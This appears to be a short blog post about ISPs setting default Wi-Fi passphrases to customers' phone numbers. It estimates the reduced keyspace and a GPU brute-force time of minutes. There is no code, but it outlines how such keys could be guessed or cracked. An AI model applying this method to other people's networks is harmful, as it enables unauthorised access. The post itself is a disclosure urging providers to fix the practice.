There’s something that has worried me greatly ever since my ISP came to install my router upgrade.
I won’t mention names, but it seems certain providers seem to favour setting the WPA-PSK passphrase to the phone number of the customer by default.
I have noticed that the ESSID is sometimes a form of the customer surname too.
This is of course dismal security-wise.
Firstly, if I can somehow get the target’s phone number (e.g. looking it up in the phonebook DUH), I can probably just guess the passphrase.
Secondly, even if I have no idea what the phone number is, by using this ‘convention’ for passphrases, the providers have GREATLY reduced the keyspace – making brute force attacks not only possible but practical too.
Let’s take a look at HOT for example. Their phone number-space is 077-XXX-XXXX.
That’s only 10,000,000 possible keys!
The following benchmarks from the Pyrit project paint a pretty bleak picture:
Now I haven’t benchmarked my home system yet, but lets conservatively say that my Radeon HD 5670 can pull a modest 5k PMKs/s I could cover the entire keyspace in 2000s. Statistically speaking, I’d likely hit the key in under 17 minutes!
Pretty practical I’d say.
So basically, providers; please stop doing stupid things like this!